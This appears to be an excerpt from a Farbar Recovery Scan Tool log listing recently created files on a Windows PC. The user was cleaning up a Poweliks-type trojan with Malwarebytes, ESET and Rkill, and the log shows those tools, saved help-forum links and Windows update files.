2016-10-16 09:37 - 2016-10-16 09:37 - 00000310 _____ C:\Users\Wayne\Desktop\Preparation Guide For Use Before Using Malware Removal Tools and Requesting Help - Virus, Trojan, Spyware, and Malware Remov.URL

2016-10-16 09:28 - 2016-10-16 09:28 - 00000022 _____ C:\Users\Wayne\Desktop\ESETPoweliksCleaner.exe_20161016.092841.6564.zip

2016-10-16 00:28 - 2016-10-16 00:28 - 00000022 _____ C:\Users\Wayne\Desktop\ESETPoweliksCleaner.exe_20161016.002825.7220.zip

2016-10-16 00:26 - 2016-10-16 09:26 - 00002050 _____ C:\Users\Wayne\Desktop\Rkill2.txt

2016-10-16 00:26 - 2016-10-16 00:27 - 00002050 _____ C:\Users\Wayne\Desktop\Rkill1.txt

2016-10-16 00:25 - 2016-10-16 00:25 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Wayne\Desktop\iExplore.exe

2016-10-16 00:01 - 2016-10-16 08:50 - 00006150 _____ C:\Users\Wayne\Desktop\ESETPoweliksCleaner.exe_20161016.000105.6824.zip

2016-10-15 23:52 - 2016-10-15 23:52 - 00000022 _____ C:\Users\Wayne\Desktop\ESETPoweliksCleaner.exe_20161015.235203.4100.zip

2016-10-15 23:50 - 2016-10-15 23:50 - 00224968 _____ (ESET) C:\Users\Wayne\Desktop\ESETPoweliksCleaner.exe

2016-10-15 23:47 - 2016-10-15 23:47 - 01577380 _____ C:\Users\Wayne\Desktop\How to remove the Poweliks Trojan (Removal Guide).pdf

2016-10-15 23:41 - 2016-10-15 23:41 - 00000264 _____ C:\Users\Wayne\Desktop\How to remove the Poweliks Trojan (Removal Guide).URL

2016-10-15 23:39 - 2016-10-15 23:39 - 00000287 _____ C:\Users\Wayne\Desktop\Infection by Trojan-PoweLike!bat via bogus Firefox update - Virus, Trojan, Spyware, and Malware Removal Logs.URL

2016-10-15 23:27 - 2016-10-15 23:30 - 00015790 _____ C:\Users\Wayne\Desktop\Fixlog1.txt

2016-10-15 23:18 - 2016-10-16 11:59 - 00000000 ____D C:\FRST

2016-10-15 23:15 - 2016-10-16 11:59 - 02406912 _____ (Farbar) C:\Users\Wayne\Desktop\FRST64.exe

2016-10-15 23:13 - 2016-10-15 23:13 - 00000277 _____ C:\Users\Wayne\Desktop\FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials.URL

2016-10-15 21:41 - 2016-10-15 22:45 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys

2016-10-15 21:40 - 2016-10-15 21:40 - 00001117 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk

2016-10-15 21:40 - 2016-10-15 21:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2016-10-15 21:40 - 2016-10-15 21:40 - 00000000 ____D C:\ProgramData\Malwarebytes

2016-10-15 21:40 - 2016-10-15 21:40 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware

2016-10-15 21:40 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys

2016-10-15 21:40 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys

2016-10-15 21:40 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys

2016-10-15 18:33 - 2016-10-15 18:33 - 22851472 _____ (Malwarebytes ) C:\Users\Wayne\Desktop\mbam-setup-2.2.1.1043.exe

2016-10-15 17:05 - 2016-10-15 17:05 - 00000102 _____ C:\Users\Wayne\Desktop\Trojan-Powe!bat infecting my PC - Resolved Malware Removal Logs - Malwarebytes Forums.url

2016-10-15 17:00 - 2016-10-15 17:00 - 00000168 _____ C:\Users\Wayne\Desktop\virusscan on access trojan-powellike!nk keeps appearing - Google Search.url

2016-10-15 16:58 - 2016-10-15 16:58 - 00000084 _____ C:\Users\Wayne\Desktop\On-Access Scan Messages - Trojan-PoweLike!bat -McAfee Communities.url

2016-10-15 16:56 - 2016-10-15 16:56 - 00000173 _____ C:\Users\Wayne\Desktop\Threat Advisory- Trojan-Powelike.url

2016-10-15 16:43 - 2016-10-15 22:27 - 00000000 ____D C:\Users\Wayne\AppData\Roaming\403522

2016-10-15 16:39 - 2016-10-16 09:43 - 00000000 ____D C:\Users\Wayne\AppData\Local\1282a1

2016-10-15 16:39 - 2016-10-15 16:39 - 00000000 ____D C:\Users\Wayne\AppData\Roaming\1282a1

2016-10-15 15:57 - 2016-10-15 15:57 - 00000200 _____ C:\Users\Wayne\Desktop\deturl.com - download videos from YouTube..URL

2016-10-15 15:28 - 2016-09-30 10:13 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll

2016-10-15 15:28 - 2016-09-30 09:28 - 00346312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll

2016-10-15 15:28 - 2016-09-30 05:37 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe

2016-10-15 15:28 - 2016-09-30 05:20 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe

2016-10-15 15:28 - 2016-09-30 05:20 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe

2016-10-15 15:28 - 2016-09-29 21:55 - 25765376 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll

2016-10-15 15:28 - 2016-09-29 20:41 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb

2016-10-15 15:28 - 2016-09-29 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll

2016-10-15 15:28 - 2016-09-29 20:26 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll

2016-10-15 15:28 - 2016-09-29 20:25 - 02895360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll

2016-10-15 15:28 - 2016-09-29 20:25 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll

2016-10-15 15:28 - 2016-09-29 20:25 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec

2016-10-15 15:28 - 2016-09-29 20:25 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll

2016-10-15 15:28 - 2016-09-29 20:25 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll

2016-10-15 15:28 - 2016-09-29 20:18 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll

2016-10-15 15:28 - 2016-09-29 20:17 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll

2016-10-15 15:28 - 2016-09-29 20:14 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll

2016-10-15 15:28 - 2016-09-29 20:13 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe

2016-10-15 15:28 - 2016-09-29 20:13 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe

2016-10-15 15:28 - 2016-09-29 20:12 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll

2016-10-15 15:28 - 2016-09-29 20:12 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll

2016-10-15 15:28 - 2016-09-29 20:09 - 06048256 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll

2016-10-15 15:28 - 2016-09-29 20:05 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe

2016-10-15 15:28 - 2016-09-29 20:02 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll

2016-10-15 15:28 - 2016-09-29 19:55 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll

2016-10-15 15:28 - 2016-09-29 19:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb

2016-10-15 15:28 - 2016-09-29 19:54 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll

2016-10-15 15:28 - 2016-09-29 19:51 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll

2016-10-15 15:28 - 2016-09-29 19:50 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll

2016-10-15 15:28 - 2016-09-29 19:47 - 20306944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll

2016-10-15 15:28 - 2016-09-29 19:47 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll

2016-10-15 15:28 - 2016-09-29 19:46 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll

2016-10-15 15:28 - 2016-09-29 19:42 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll

2016-10-15 15:28 - 2016-09-29 19:42 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec

2016-10-15 15:28 - 2016-09-29 19:42 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll

2016-10-15 15:28 - 2016-09-29 19:42 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll

2016-10-15 15:28 - 2016-09-29 19:41 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll

2016-10-15 15:28 - 2016-09-29 19:38 - 02286592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll

2016-10-15 15:28 - 2016-09-29 19:36 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll

2016-10-15 15:28 - 2016-09-29 19:35 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll

2016-10-15 15:28 - 2016-09-29 19:35 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll

2016-10-15 15:28 - 2016-09-29 19:33 - 00724992 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe

2016-10-15 15:28 - 2016-09-29 19:33 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll

2016-10-15 15:28 - 2016-09-29 19:32 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll

2016-10-15 15:28 - 2016-09-29 19:32 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll

2016-10-15 15:28 - 2016-09-29 19:32 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll

2016-10-15 15:28 - 2016-09-29 19:32 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe

2016-10-15 15:28 - 2016-09-29 19:31 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl

2016-10-15 15:28 - 2016-09-29 19:31 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll

2016-10-15 15:28 - 2016-09-29 19:24 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll

2016-10-15 15:28 - 2016-09-29 19:21 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll

2016-10-15 15:28 - 2016-09-29 19:19 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll

2016-10-15 15:28 - 2016-09-29 19:19 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll

2016-10-15 15:28 - 2016-09-29 19:17 - 02920960 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll

2016-10-15 15:28 - 2016-09-29 19:17 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll

2016-10-15 15:28 - 2016-09-29 19:15 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll

2016-10-15 15:28 - 2016-09-29 19:14 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll

2016-10-15 15:28 - 2016-09-29 19:13 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll

2016-10-15 15:28 - 2016-09-29 19:12 - 04608512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll

2016-10-15 15:28 - 2016-09-29 19:07 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll

2016-10-15 15:28 - 2016-09-29 19:05 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl

2016-10-15 15:28 - 2016-09-29 19:05 - 01544192 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll

2016-10-15 15:28 - 2016-09-29 19:05 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll

2016-10-15 15:28 - 2016-09-29 19:05 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll

2016-10-15 15:28 - 2016-09-29 19:03 - 13653504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll

2016-10-15 15:28 - 2016-09-29 18:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll

2016-10-15 15:28 - 2016-09-29 18:46 - 02444288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll

2016-10-15 15:28 - 2016-09-29 18:43 - 01312768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll

2016-10-15 15:28 - 2016-09-29 18:42 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll

2016-10-15 15:28 - 2016-09-15 05:30 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll

2016-10-15 15:28 - 2016-09-15 05:30 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll

2016-10-15 15:28 - 2016-09-15 05:15 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll

2016-10-15 15:28 - 2016-09-15 05:15 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll

2016-10-15 15:28 - 2016-09-12 11:13 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys

2016-10-15 15:28 - 2016-09-12 11:13 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys

2016-10-15 15:28 - 2016-09-12 11:08 - 01465344 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\adsmsext.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00260608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adsmsext.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll

2016-10-15 15:28 - 2016-09-12 10:39 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe

2016-10-15 15:28 - 2016-09-12 10:37 - 03218944 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys

2016-10-15 15:28 - 2016-09-12 10:32 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys

2016-10-15 15:28 - 2016-09-12 10:32 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys

2016-10-15 15:28 - 2016-09-12 10:32 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys

2016-10-15 15:28 - 2016-09-12 10:31 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe

2016-10-15 15:28 - 2016-09-12 10:29 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe

2016-10-15 15:28 - 2016-09-12 10:25 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll

2016-10-15 15:28 - 2016-09-12 09:08 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll

2016-10-15 15:28 - 2016-09-12 08:43 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll

2016-10-15 15:28 - 2016-09-12 08:43 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll

2016-10-15 15:28 - 2016-09-10 06:19 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll

2016-10-15 15:28 - 2016-09-10 05:53 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll

2016-10-15 15:28 - 2016-09-09 08:29 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi

2016-10-15 15:28 - 2016-09-09 08:26 - 00706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi

2016-10-15 15:28 - 2016-09-09 08:23 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:01 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll

2016-10-15 15:28 - 2016-09-09 08:00 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll

2016-10-15 15:28 - 2016-09-09 08:00 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll

2016-10-15 15:28 - 2016-09-09 08:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll

2016-10-15 15:28 - 2016-09-09 08:00 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll

